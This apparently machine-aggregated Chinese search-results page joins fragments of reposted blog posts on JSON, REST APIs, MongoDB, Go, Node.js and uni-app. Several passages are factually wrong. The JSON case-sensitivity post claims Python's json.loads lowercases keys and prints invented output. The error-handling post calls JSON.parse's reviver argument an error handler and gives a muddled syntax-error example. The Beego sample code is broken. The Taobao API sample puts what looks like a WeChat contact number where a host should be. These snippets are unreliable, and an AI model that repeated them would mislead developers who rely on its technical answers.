[前后端通信JSON数据格式最佳实践]的搜索结果

...人家还特别贴心地支持数据库操作，让你轻轻松松就能把数据存到MySQL或者MongoDB这些数据库里去。 四、设计原则 以下是使用Beego开发RESTful API的一些设计原则： 1. 保持简单 RESTful API应该是简单的，易于理解和使用的。这意味着应该尽可能减少API的复杂性，并遵循RESTful API的设计原则。 2. 明确的状态 每一个HTTP请求都应该返回一个明确的状态。比如，假设你请求一个东西，如果这个请求一切顺利，就相当于你得到了一个“YES”，这时候，服务器会给你回个HTTP状态码200，表示“妥了，兄弟，你的请求我成功处理了”。而要是请求出岔子了，那就等于收到了一个“NO”，这时候，服务器可能会甩给你一个400或者500的HTTP状态码，意思是：“哎呀，老铁，你的请求有点问题，不是格式不对（400），就是服务器这边内部出了状况（500）。” 3. 使用标准的HTTP方法 HTTP定义了8种方法，包括GET, POST, PUT, DELETE, HEAD, OPTIONS, CONNECT和TRACE。应该始终使用这些方法，而不是自定义的方法。 4. 使用URI来表示资源 URI是统一资源标识符，它是唯一标识资源的方式。应该使用URI来表示资源，而不是使用ID或其他非唯一的标识符。 5. 使用HTTP头部信息 HTTP头部信息可以提供关于请求或响应的附加信息。应该尽可能使用HTTP头部信息来提高API的功能性。 6. 返回适当的格式 应该根据客户端的需求返回适当的数据格式，例如JSON或XML。 五、示例代码 以下是一个使用Beego创建RESTful API的简单示例： go package main import ( "github.com/astaxie/beego" ) type User struct { Id int json:"id" Name string json:"name" Email string json:"email" } func main() { beego.Router("/users/:id", &UserController{}) beego.Run() } type UserController struct{} func (u UserController) Get(ctx beego.Controller) { id := ctx.Params.Int(":id") user := &User{Id: id, Name: "John Doe", Email: "john.doe@example.com"} ctx.JSON(200, user) } 在这个示例中，我们首先导入了beego包，然后定义了一个User结构体。然后我们在main函数中设置了路由，当收到GET /users/:id请求时，调用UserController的Get方法。 在Get方法中，我们从URL参数中获取用户ID，然后创建一个新的User对象，并将其转换为JSON格式，最后返回给客户端。 这就是使用Beego创建RESTful API的一个简单示例。当然，这只是一个基础的例子，实际的API可能会更复杂。不过呢，只要你按照上面提到的设计原则来，就能轻轻松松地设计出既高效又超级好用的RESTful API，保证让你省心省力。

...、文档型的NoSQL数据库系统，它使用JSON-like格式（称为BSON）来存储数据，并提供了高可用性、水平扩展以及灵活的数据模型。在本文中，用户遇到的“Error Establishing Connection to Database”错误就是在尝试连接MongoDB数据库时可能出现的问题。 防火墙 , 防火墙是一种计算机网络安全技术，用于监控和控制进出特定网络或系统的网络流量。在本文语境下，防火墙可能阻止了MongoDB服务器接收来自其他设备的连接请求，导致数据库连接失败。通过配置防火墙规则，可以允许特定服务如MongoDB接受合法的外部连接，确保数据库能够正常对外提供服务。 连接池 , 虽然本文未直接提到连接池，但在处理数据库连接问题时这是一个常见的概念。连接池是一种软件架构设计模式，其目的是在一个应用程序与数据库之间管理并复用多个预设的数据库连接资源，以减少频繁创建和销毁连接带来的性能开销。在高并发场景下，如果没有合理设置和管理连接池，可能会因连接数达到上限而导致新的数据库连接请求无法成功建立，从而出现“Error Establishing Connection to Database”的错误提示。

...yes，将调用缓存的数据，速度比较快 result_type String 否 [json,jsonu,xml,serialize,var_export]返回数据格式，默认为json，jsonu输出的内容中文可以直接阅读 lang String 否 [cn,en,ru]翻译语言，默认cn简体中文 version String 否 API版本 2.请求参数 请求参数：api= 参数说明：其它参数:参考淘宝开放平台接口文档，与淘宝的参数一致 https://open.taobao.com/api.htm?docId=140&docType=2 名称 类型 必须 描述 api String 淘宝开放平台的接口名（如：taobao.picture.upload( 上传单张图片 )） session String 授权换取的session_id [其他参数] String 其它参数:参考淘宝开放平台接口文档，与淘宝的参数一致 https://open.taobao.com/api.htm?docId=140&docType=2 3. 请求示例（CURL、PHP 、PHPsdk 、Java 、C 、Python...) coding:utf-8"""Compatible for python2.x and python3.xrequirement: pip install requests"""from __future__ import print_functionimport requests 请求示例 url 默认请求参数已经做URL编码url = "https://vx19970108018/taobao/custom/?key=<您自己的apiKey>&secret=<您自己的apiSecret>&method="headers = {"Accept-Encoding": "gzip","Connection": "close"}if __name__ == "__main__":r = requests.get(url, headers=headers)json_obj = r.json()print(json_obj) 4.响应示例 {"logistics_dummy_send_response":{"shipping":{"is_success":true} }} 本篇文章为转载内容。原文链接：https://blog.csdn.net/tbprice/article/details/125553595。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

1. JSON解析不分大小写 为什么这很重要？ 嘿，大家好！今天我们要聊的是JSON解析中一个常常被忽视但又极其重要的特性——大小写不敏感。这个功能在实际开发里超级实用，特别是当你得对付来自四面八方的数据时，比如说处理API请求或用户填的表单啥的。 想象一下，你正在开发一款应用，需要从服务器获取一些数据，这些数据可能是通过API返回的。不过嘛，服务器那边可能有其他的程序员在维护，他们的大小写风格可能会跟你不一样，给字段起的名字也会有所不同。如果我们解析器的本事不够强，那我们就得不停地改代码，来迁就各种奇葩的命名规矩。这听上去是不是挺麻烦的？所以，知道并用上JSON解析时的大小写不敏感特性，就能让我们的工作轻松不少。 2. JSON的基本概念 在深入讨论之前，先简单回顾一下什么是JSON。JSON（JavaScript Object Notation）是一种轻量级的数据交换格式。它基于JavaScript的一个子集，但实际上几乎所有的编程语言都有库支持JSON解析和生成。 示例1：基本的JSON对象 json { "name": "张三", "age": 28, "is_student": false, "hobbies": ["阅读", "编程", "旅行"] } 在这个简单的例子中，我们可以看到一个包含字符串、数字、布尔值和数组的对象。每个键都是一个字符串，并且它们之间是区分大小写的。不过呢，当我们解析这个JSON时，解析器通常会把键的大小写统统忽略掉，直接给它们统一成小写。 3. 解析器如何处理大小写 现在，让我们来看看具体的解析过程。现在大部分编程语言都自带了超级好用的JSON解析工具，用它们来处理JSON数据时，根本不用操心大小写的问题，特别省心。它们会将所有键转换为一种标准形式，通常是小写。这就表示，就算你开始时在原始的JSON里用了大写或大小写混用，最后这些键还是会自动变成小写。 示例2：大小写不敏感的解析 假设我们有以下JSON数据： json { "Name": "李四", "AGE": 35, "Is_Student": true, "Hobbies": ["足球", "音乐"] } 如果我们使用Python的json库来解析这段数据： python import json data = '{"Name": "李四", "AGE": 35, "Is_Student": true, "Hobbies": ["足球", "音乐"]}' parsed_data = json.loads(data) print(parsed_data) 输出将是： python {'name': '李四', 'age': 35, 'is_student': True, 'hobbies': ['足球', '音乐']} 可以看到，所有的键都被转换成了小写。这就意味着我们在后面处理数据的时候，可以更轻松地找到这些键，完全不需要担心大小写的问题。 4. 实际开发中的应用 理解了这个特性之后，我们在实际开发中应该如何应用呢？首先，我们需要确保我们的代码能够正确处理大小写不同的情况。比如说，在拿数据的时候，咱们最好每次都确认一下键名是不是小写，别直接用固定的大小写硬来。 示例3：处理大小写不一致的情况 假设我们有一个函数，用于从用户输入的JSON数据中提取姓名信息： python def get_name(json_data): data = json.loads(json_data) return data.get('name') or data.get('NAME') or data.get('Name') 测试 json_input1 = '{"name": "王五"}' json_input2 = '{"NAME": "赵六"}' json_input3 = '{"Name": "孙七"}' print(get_name(json_input1)) 输出: 王五 print(get_name(json_input2)) 输出: 赵六 print(get_name(json_input3)) 输出: 孙七 在这个例子中，我们通过get方法尝试获取三个可能的键名（'name'、'NAME'、'Name'），确保无论用户输入的JSON数据中使用哪种大小写形式，我们都能正确提取到姓名信息。 5. 结论与思考 通过今天的讨论，我们了解到JSON解析中的大小写不敏感特性是一个非常有用的工具。它可以帮助我们减少因大小写不一致带来的错误，提高代码的健壮性和可维护性。当然，这并不意味着我们可以完全把大小写的事儿抛在脑后，而是说我们应该用更灵活的方式去应对它们。 希望这篇文章能帮助你更好地理解和利用这一特性。如果你有任何疑问或者想法，欢迎在评论区留言交流。咱们下次再见！

...在这个时代，大家都把数据安全看得跟命根子似的，HTTPs加密传输早就是网站标配啦，没它可不行！本文我们将深入探讨如何利用Go Gin框架实现这一功能，让我们一起走进这场技术之旅吧！ 一、理解HTTPS与重定向（2） 首先，我们来简单回顾一下HTTPS的工作原理。你知道HTTPS吗？它其实就像是HTTP的大哥，是个安全升级版。具体来说呢，就是在HTTP的基础上，套上了一层SSL/TLS的“防护罩”，这个“防护罩”会对传输的数据进行加密处理。这样一来，就像有个忠诚的保镖在保护我们的数据，能够有效挡下那些想在中间搞小动作的坏家伙，避免我们的信息被偷窥或者泄露出去的风险。当有用户不走“安全通道”，试图通过HTTP来访问我们家的网站时，咱们得像个贴心的小助手那样，帮他们自动拐个弯儿，转跳到更安全的HTTPS地址上去。 二、Go Gin框架中的中间件设计（3） Go Gin的设计理念之一就是“中间件”，这是一种可以插入请求处理流程中执行额外操作的组件。想要实现HTTPS强制跳转这个需求，咱们完全可以动手写一个定制版的中间件来轻松搞定这件事儿。 go package main import ( "github.com/gin-gonic/gin" ) func ForceHTTPSMiddleware() gin.HandlerFunc { return func(c gin.Context) { if c.Request.TLS == nil { // 检查当前请求是否为HTTPS url := "https://" + c.Request.Host + c.Request.URL.String() c.Redirect(301, url) // 若不是HTTPS，则重定向至HTTPS版本 c.Abort() // 中止后续的处理流程 } else { c.Next() // 如果已经是HTTPS请求，继续执行下一个中间件或路由处理函数 } } } 上述代码创建了一个名为ForceHTTPSMiddleware的中间件，该中间件会在每次请求到达时检查其是否为HTTPS请求。如果不是，它将生成对应的HTTPS URL并以301状态码（永久重定向）引导客户端跳转。 三、中间件的使用与部署（4） 接下来，我们要将这个中间件添加到Go Gin引擎中，确保所有HTTP请求都会先经过这个中间件： go func main() { r := gin.Default() // 使用自定义的HTTPS强制跳转中间件 r.Use(ForceHTTPSMiddleware()) // 添加其他路由规则... r.GET("/", func(c gin.Context) { c.JSON(200, gin.H{"message": "Welcome to the secure zone!"}) }) // 启动HTTPS服务器 err := r.RunTLS(":443", "path/to/cert.pem", "path/to/key.pem") if err != nil { panic(err) } } 注意，在运行HTTPS服务器时，你需要提供相应的证书文件路径（如cert.pem和key.pem）。这样，你的Go Gin应用就成功实现了HTTPS强制跳转。 结语（5） 在解决Go Gin框架下的HTTPS强制跳转问题时，我们不仅了解了如何根据实际需求编写自定义中间件，还加深了对HTTPS工作原理的认识。这种带着情感化和技术思考的过程，正是编程的魅力所在。面对每一个技术挑战，只要我们保持探索精神，总能找到合适的解决方案。而Go Gin这个框架，它的灵活性和强大的功能简直就像个超级英雄，在我们实现各种需求的时候，总能给力地助我们一臂之力。

...常需要处理各种类型的数据，其中最常见的一种就是JSON格式的数据。JSON这东西，可以说是个超级实用的数据传输小能手。它设计得既简单又轻便，不仅咱们人类读起来、写起来轻松愉快，连机器也能毫不费力地理解和生成它。就像是数据世界里的“通用语言”，让信息交换变得轻轻松松、简简单单。然而，在日常处理大量JSON数据时，我们免不了会遇到些小插曲，比如那个让人头疼的JSON解析异常问题。 在本文中，我们将以SeaTunnel为例，深入探讨如何解决JSON解析异常的问题，并给出具体的实例代码。 二、什么是SeaTunnel SeaTunnel是一个开源的实时数据同步系统，它主要用于将数据从一个地方快速、准确地同步到另一个地方。SeaTunnel支持多种数据源和目标，包括但不限于MySQL、Oracle、HBase、HDFS等。它还配备了一整套超级好用的API工具箱，让开发者能够轻轻松松地进行数据同步操作，就像玩乐高积木一样便捷。 三、JSON解析异常的原因 JSON解析异常通常发生在数据源返回的JSON格式错误的情况下。比如，假如数据源给咱们返回的JSON字符串里头混进了不应该出现的非法字符，或者整个结构乱七八糟，跟JSON的标准格式对不上号，这时候SeaTunnel可就不乐意了，它会立马抛出一个JSON解析异常来表达它的不满和抗议。 四、解决JSON解析异常的方法 对于JSON解析异常的问题，我们可以采取以下几种方法来解决： 1. 检查并修正数据源返回的JSON数据 这是最直接也是最有效的方法。我们完全可以通过瞅瞅数据源头返回的结果，像侦探破案那样，揪出引发解析异常的那个“罪魁祸首”，然后对症下药，把它修正过来。 2. 使用JSON解析库 SeaTunnel本身已经内置了对JSON的支持，但是如果数据源返回的JSON格式非常复杂，我们可能需要使用更强大的JSON解析库来进行处理。 3. 优化SeaTunnel配置 通过调整SeaTunnel的配置参数，我们可以让其更加灵活地处理各种类型的JSON数据。 五、实战演示 下面，我们将通过一个实际的例子，展示如何使用SeaTunnel处理JSON解析异常的问题。 假设我们需要从一个外部服务器上获取一些JSON格式的数据，并将其同步到本地数据库中。但是，这个服务器上的JSON数据格式有点儿“另类”，它里面掺杂了一大堆不合规的字符呢！ 首先，我们需要修改SeaTunnel的配置，使其能够容忍这种特殊的JSON格式。具体来说，我们可以在配置文件中添加以下代码： yaml processors: - name: json properties: tolerant: true 然后，我们可以创建一个新的任务，用于从服务器上获取JSON数据： json { "name": "example", "sources": [ { "type": "http", "properties": { "url": "https://example.com/data.json" } } ], "sinks": [ { "type": "mysql", "properties": { "host": "localhost", "port": 3306, "username": "root", "password": "", "database": "example", "table": "data" } } ] } 最后，我们只需要运行 SeaTunnel 的命令，就可以开始同步数据了： bash ./seata-tunnel.sh run example 六、结论 总的来说，解决SeaTunnel中的JSON解析异常问题并不是一件困难的事情。只要我们掌握了正确的处理方法，就能够有效地避免这种情况的发生。同时，我们也可以利用SeaTunnel的强大功能，来处理各种复杂的JSON数据。

...中，经常需要处理各种数据，其中一种常见的数据格式就是JSON（JavaScript Object Notation）。它是一种轻量级的数据交换格式，易于人阅读和编写，同时也易于机器解析和生成。 然而，就像所有的编程语言一样，在处理JSON时也会遇到各种各样的异常情况，如语法错误、类型转换错误等。这些小异常如果不及时处理好，就像颗定时炸弹一样，随时可能让程序罢工，甚至把我们的宝贵数据给弄丢，这样一来，咱们的工作效率可就要大打折扣啦！ 因此，本文将重点介绍如何通过编程来处理JSON的各种异常，帮助我们在实际工作中更好地应对可能出现的问题。 二、常见JSON异常 1. JSON语法错误 JSON语法错误通常是因为JSON字符串不符合语法规则，例如缺少引号、括号不匹配、逗号错误等。以下是一个简单的例子： javascript var json = '{"name":"John","age":30,"city":"New York"}'; 这个JSON字符串是合法的，但如果我们将最后一个逗号去掉，就变成了这样： javascript var json = '{"name":"John","age":30,"city":"New York"}; 这就是一个语法错误，因为JSON语句末尾不应该出现分号。 2. JSON类型错误 JSON类型错误通常是因为JSON数据的类型与预期不符，例如我们期望的是字符串，但实际上得到了数字或者布尔值。以下是一个例子： javascript var json = '{"name":"John", "age": 30, "city": true}'; 在这个例子中，我们期望"city"字段的值是一个字符串，但实际上它是true。这就造成了类型错误。 三、异常处理方法 对于JSON语法错误，我们可以使用JSON.parse()函数的第二个参数来捕获并处理错误。这个参数啊，其实是个“救火队长”类型的回调函数。一旦解析过程中出现了啥岔子，它就会被立马召唤出来干活儿，而且人家干活的时候还不会两手空空，会带着一个包含了错误信息的“包裹”（也就是错误对象）一起处理问题。 javascript try { var data = JSON.parse(json); } catch (e) { console.error('Invalid JSON:', e.message); } 对于JSON类型错误，我们需要根据具体的业务逻辑来决定如何处理。比如，如果某个地方可以容纳各种各样的值，那咱们就可以痛快地把它变成我们需要的类型；要是某个地方非得是某种特定类型不可，那咱就得果断抛出一个错误提示，让大家都明白。 javascript var json = '{"name":"John", "age": 30, "city": true}'; try { var data = JSON.parse(json); if (typeof data.city === 'boolean') { data.city = data.city.toString(); } } catch (e) { console.error('Invalid JSON:', e.message); } 四、总结 在处理JSON时，我们应该充分考虑到可能出现的各种异常情况，并做好相应的异常处理工作。这不仅可以保证程序的稳定性，也可以提高我们的工作效率。 同时，我们也应该尽可能地避免产生异常。比如说，咱们得保证咱们的JSON字符串老老实实地遵守语法规则，同时呢，还得像个侦探一样，对可能出现的各种类型错误提前做好排查和预防工作，别让它们钻了空子。 总的来说，掌握好JSON的异常处理方法，是我们成为一名优秀的开发者的重要一步。希望这篇文章能够对你有所帮助。

... 设置 page.json 3.3 vue 配置 3.4 tabBar组件代码 3.5 setRole方法 1. 需求背景 公司要求开发一个小程序，要求二种不同权限的人群都可以使用，使用时根据不同的权限，获取不同的tabbar，以及展示对应不同的内容。 登录页面分为 用户登录 及 管理员登录 1.2 用户登录和管理员登录的 tabbar 根据账号角色进行对应展示 1.1 源码下载 【源码】uni-app 微信小程序根据角色动态的更改底部tabbar 2. 问题前提及思路 uniapp 本身的动态设置tabbar方法 uni.setTabBarItem(OBJECT)，但是使用这个方法刷新切换时会短暂白屏以及uni.setTabBarItem只能满足动态设置tabbar一项的内容，无法实现多项的需求。所有综合考虑决定还是使用uview-ui的Tabbar底部导航栏组件。 最终选择了uni-app的uview-ui（UI框架）+ vuex来完成这个功能。其中，vuex主要是用来存储当前的tabbar内容的。 3. 开始撸 3.1 设置 tabbar.js 配置不同角色不同的菜单 在utils文件夹下新建一个tabbar.js，来存储不同权限下的底部导航数据。我这里有两种不同的权限，第二种权限比第一种权限多了两项菜单。 // 普通用户tabbarlet tab1 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]// 管理员用户tabbarlet tab2 = [{"pagePath": "/pages/loginLogRecord/index","text": "登录记录","iconPath": "/static/icon_bx.png","selectedIconPath": "/static/icon_bx_hover.png"},{"pagePath": "/pages/accessRecord/index","text": "存取记录","iconPath": "/static/icon_adress.png","selectedIconPath": "/static/icon_adress_hover.png"},{"pagePath": "/pages/authorizationList/index","text": "授权名单","iconPath": "/static/authorization.png","selectedIconPath": "/static/authorization_hover.png"},{"pagePath": "/pages/inventory/index","text": "盘点","iconPath": "/static/inventory.png","selectedIconPath": "/static/inventory_hover.png"},{"pagePath": "/pages/person/index","text": "我的","iconPath": "/static/icon_user.png","selectedIconPath": "/static/icon_user_hover.png"}]export default [tab1,tab2] 3.2 设置 page.json 在page.json文件里，把tabbar里的几个页面去重放进去。只是单纯的写个路径，什么都不要添加。test，iconPath，selectedIconPath 字段全部删掉这里不需要配置。 "tabBar": {"color": "333333","selectedColor": "328CFA","backgroundColor": "FFFFFF","list": [{"pagePath": "pages/loginLogRecord/index"},{"pagePath": "pages/accessRecord/index"},{"pagePath": "pages/authorizationList/index"},{"pagePath": "pages/inventory/index"},{"pagePath": "pages/person/index"}]} 3.3 vue 配置 uniapp是可以直接使用vuex的，所以，直接在项目的根目录下新建一个store文件夹，存储相关数据。 import Vue from 'vue'import Vuex from 'vuex'Vue.use(Vuex)import tabBar from '@/utils/tabbar.js'const store = new Vuex.Store({state: {wx_token: '',tabBarList: [],roleId: 0, //0 普通员工，1管理员},mutations: {// 设置wx_tokensetWxtoken(state, data) {state.wx_token = data;uni.setStorageSync('wx_token',data)},// 设置用户角色IDsetRoleId(state, data) {state.roleId = data;uni.setStorageSync('roleId',data)state.tabBarList = tabBar[data];uni.setStorageSync('tabBarList',tabBar[data])},},})export default store 在入口文件 main.js 中使用 import Vue from 'vue'import App from './App'import uView from "uview-ui";import store from './store/index'Vue.use(uView);Vue.config.productionTip = falseVue.prototype.$store = storeApp.mpType = 'app'const app = new Vue({...App,store})app.$mount() 3.4 tabBar组件代码 <template><view><u-tabbar :list="tabBarList" :active-color="activeColor" :inactive-color="inactiveColor" :height="84":border-top="borderTop"></u-tabbar></view></template><script>import store from '@/store'export default {props:{tabBarList:{type:Array,default:uni.getStorageSync('tabBarList')} },data() {return {borderTop: true,inactiveColor: '909399',activeColor: '328CFA',} },}</script> 3.5 setRole方法 登录时，获取返回的权限，然后再调用setRole方法 <script>import { mapMutations } from 'vuex';export default {data() {return {roleId:0,};},methods: {methods: {...mapMutations(['setRoleId']),},//登录login() {this.setRoleId(this.roleId)// 0或者1uni.switchTab({url: '../index/index' //然后跳转到登录后的首页})} }}</script> 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_36410795/article/details/109075488。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

NoSQL数据库 , NoSQL（Not Only SQL）是一种非关系型数据库，它不采用传统的关系模型来存储数据，而是使用键值对、文档、列族、图形等多种数据模型进行存储。在MongoDB的语境下，其作为一种流行的NoSQL数据库，允许开发者以灵活的JSON-like文档格式存储数据，并且支持水平扩展和高可用性，尤其适合处理大量非结构化或半结构化的数据。 事务（Transaction） , 在数据库系统中，事务是一个不可分割的工作单元，它包含一系列操作，这些操作要么全部成功执行，要么全部失败回滚。在MongoDB中，从4.0版本开始支持事务功能，这意味着一组相关的数据库操作可以被封装在一个事务内，从而确保数据的一致性和完整性。事务必须满足ACID（原子性、一致性、隔离性、持久性）原则，即保证一次事务内的所有更改要么全部生效，要么全部撤销，不会出现部分生效导致的数据不一致状态。 原子性（Atomicity） , 原子性是事务处理的基本属性之一，在MongoDB中表现为一个事务中的所有操作要么全部完成，要么全部不执行。具体到文章中的电商网站示例，更新用户信息和商品库存的操作被封装在一个事务中，如果其中一个操作失败，那么整个事务将被回滚，以确保数据始终保持一致，不会处于中间状态，避免引发数据不一致的问题。

...会读取配置文件来获取数据库连接信息、监听端口等设置。如果配置文件格式不正确或关键参数缺失，服务自然无法正常启动。 python 示例：从配置文件读取端口信息 import tornadotools.config config = tornadotools.config.load_config('my_config.json') port = config.get('server', {}).get('port', 8000) 如果配置文件中没有指定端口，将默认为8000 然后在启动应用时使用该端口 app.listen(port) 2.2 解决方案 检查配置文件是否符合预期格式且包含所有必需的参数。就像上面举的例子那样，假如你在“my_config.json”这个配置文件里头忘记给'server.port'设定端口值了，那服务就可能因为找不到合适的端口而罢工启动不了，跟你闹脾气呢。 json // 正确的配置文件示例： { "server": { "port": 8888 }, // 其他配置项... } 此外，建议在部署前先在本地环境模拟生产环境测试配置文件的有效性，避免上线后才发现问题。 3. 总结与思考 面对Tornado服务部署过程中可能出现的各种问题，我们需要保持冷静，遵循一定的排查步骤：首先确认基础环境搭建无误（包括依赖安装），然后逐一审查配置文件和其他环境变量。每次成功解决故障，那都是实实在在的经验在手心里攒着呢，而且这每回的过程，都像是咱们对技术的一次深度修炼，让理解力蹭蹭往上涨。 记住，调试的过程就像侦探破案一样，要耐心细致地查找线索，理性分析，逐步抽丝剥茧，最终解决问题。在这个过程中，不断反思和总结，你会发现自己的技术水平也在悄然提升。部署虽然繁琐，但当你看到自己亲手搭建的服务稳定运行时，那种成就感会让你觉得一切付出都是值得的！

...：Node.js 的实践之旅 1. 引言 在现代软件开发领域，微服务架构因其解耦、灵活扩展和高效运维的特性而备受推崇。嘿，你知道吗？Node.js这家伙，它有个绝活儿，就是那个异步非阻塞I/O模型，加上事件驱动的机制，真是个性能小旋风，在搭建微服务架构时，表现得那叫一个亮眼，有着不可替代的独特优势！本文将带您深入探讨如何利用 Node.js 实现微服务，并通过具体的代码示例来帮助您理解并掌握这一过程。 2. Node.js 与微服务架构的契合点 Node.js 的轻量级和高性能使其成为实现微服务的理想选择。它的设计采用了单线程和事件循环模式，这意味着每个服务能够超级高效地同时应对大批量的请求，就像是一个技艺高超的小哥在忙碌的餐厅里轻松处理众多点单一样。这种机制特别适合搭建那种独立部署、只专心干一件事的微服务模块，让它们各司其职，把单一业务功能发挥到极致。此外，Node.js 生态系统中的大量库和框架（如Express、Koa等）也为快速搭建微服务提供了便利。 3. 利用 Node.js 创建微服务实例 下面我们将通过一个简单的 Node.js 微服务创建示例来演示其实现过程： javascript // 引入 express 框架 const express = require('express'); const app = express(); // 定义一个用户服务接口 app.get('/users', (req, res) => { // 假设我们从数据库获取用户列表 const users = [ { id: 1, name: 'Alice' }, { id: 2, name: 'Bob' } ]; res.json(users); }); // 启动微服务并监听指定端口 app.listen(3000, () => { console.log('User service is running on port 3000...'); }); 上述代码中，我们创建了一个简单的基于 Express 的微服务，它提供了一个获取用户列表的接口。这个啊，其实就是个入门级的小栗子。在真实的项目场景里，这个服务可能会跟数据库或者其他服务“打交道”，从它们那里拿到需要的数据。然后，它会通过API Gateway这位“中间人”，对外提供一个统一的服务接口，让其他应用可以方便地和它互动交流。 4. 微服务间通信 使用gRPC或HTTP 在微服务架构下，各个服务间的通信至关重要。Node.js 支持多种通信方式，例如 gRPC 和 HTTP。以下是一个使用 HTTP 进行微服务间通信的例子： javascript // 在另一个服务中调用上述用户服务 const axios = require('axios'); app.get('/orders/:userId', async (req, res) => { try { const response = await axios.get(http://user-service:3000/users/${req.params.userId}); const user = response.data; // 假设我们从订单服务获取用户的订单信息 const orders = getOrdersFromDatabase(user.id); res.json(orders); } catch (error) { res.status(500).json({ error: 'Failed to fetch user data' }); } }); 在这个例子中，我们的“订单服务”通过HTTP客户端向“用户服务”发起请求，获取特定用户的详细信息，然后根据用户ID查询订单数据。 5. 总结与思考 利用 Node.js 构建微服务架构，我们可以享受到其带来的快速响应、高并发处理能力以及丰富的生态系统支持。不过呢，每种技术都有它最适合施展拳脚的地方和需要面对的挑战。比如说，当碰到那些特别消耗CPU的任务时，Node.js可能就不是最理想的解决方案了。所以在实际操作中，咱们得瞅准具体的业务需求和技术特性，小心翼翼地掂量一下，看怎样才能恰到好处地用 Node.js 来构建一个既结实又高效的微服务架构。就像是做菜一样，要根据食材和口味来精心调配，才能炒出一盘色香味俱全的好菜。同时，随着我们提供的服务越来越多，咱们不得不面对一些额外的挑战，比如怎么管理好这些服务、如何进行有效的监控、出错了怎么快速恢复这类问题。这些问题就像是我们搭建积木过程中的隐藏关卡，需要我们在构建和完善服务体系的过程中，不断去摸索、去改进、去优化，让整个系统更健壮、更稳定。

...配置解析器，支持读取JSON、YAML或XML格式的配置文件。下面是一个简单的JSON配置文件示例： json { "app": { "name": "MyApp", "version": "1.0.0", "environment": "development" }, "database": { "host": "localhost", "port": 5432, "username": "myuser", "password": "mypassword", "dbname": "mydb" } } 在Go代码中，我们可以使用yaml或json包来解析这个配置文件： go package main import ( "encoding/json" "fmt" "io/ioutil" "log" "github.com/spf13/viper" ) func main() { viper.SetConfigFile("config.json") // 设置配置文件路径 if err := viper.ReadInConfig(); err != nil { // 读取配置文件 log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 appName := viper.GetString("app.name") appVersion := viper.GetString("app.version") dbHost := viper.GetString("database.host") fmt.Printf("应用名称：%s, 版本：%s, 数据库主机：%s\n", appName, appVersion, dbHost) } 通过这种方式，我们可以在不修改代码的情况下，通过更改配置文件来改变应用的行为，极大地提高了应用的可维护性和灵活性。 四、整合环境变量与配置文件 在实际项目中，通常会结合使用环境变量和配置文件来实现更复杂的配置管理。例如，可以通过环境变量来控制配置文件的加载路径，或者根据环境变量的值来选择使用特定的配置文件： go package main import ( "os" "path/filepath" "testing" "github.com/spf13/viper" ) func main() { // 设置环境变量 os.Setenv("CONFIG_PATH", "path/to/your/config") // 读取配置文件 viper.SetConfigType("yaml") // 根据你的配置文件类型进行设置 viper.AddConfigPath(os.Getenv("CONFIG_PATH")) // 添加配置文件搜索路径 err := viper.ReadInConfig() if err != nil { log.Fatalf("Error reading config file: %v", err) } // 获取配置数据 // ... } 通过这种方式，我们可以根据不同环境（如开发、测试、生产）使用不同的配置文件，同时利用环境变量动态调整配置路径，实现了高度灵活的配置管理。 结语 GoSpring框架通过支持环境变量和配置文件的集成，为开发者提供了强大的工具来管理应用配置。哎呀，这种灵活劲儿啊，可真是帮了大忙！它就像个魔法师，能让你的开发工作变得轻松愉快，效率嗖嗖的往上窜。而且，别看它这么灵巧，稳定性却是一点儿也不含糊。不管是在哪个环境里施展它的魔法，都能保持一贯的好状态，稳如泰山。这就像是你的小伙伴，无论走到哪儿，都能给你带来安全感和惊喜，你说赞不赞？哎呀，兄弟，你懂的，现在咱们的应用就像个大家庭，人多了，事儿也杂了，对吧？这时候，怎么管好这个家庭，让每个人都各司其职，不乱套，就显得特别重要了。这就得靠咱们合理的配置管理策略来搞定。比如说，得有个清晰的分工，谁负责啥，一目了然；还得有规矩，比如更新软件得按流程来，不能随随便便；还得有监控，随时看看家里人都在干啥，有问题能及时发现。这样，咱们的应用才能健健康康地成长，不出岔子。所以，合理的配置管理策略，简直就是咱们应用界的定海神针啊！嘿，兄弟！这篇文章就是想给你开开小灶，让你能轻松掌握 GoSpring 在配置管理这块儿的厉害之处。别担心，我不会用一堆冰冷的术语把你吓跑，咱俩就像老朋友聊天一样，把这玩意儿讲得跟吃饭喝水一样简单。跟着我，你就能发现 GoSpring 配置管理有多牛逼，怎么用都顺手，让你的工作效率嗖嗖地往上涨！咱们一起探索，一起享受技术带来的乐趣吧！

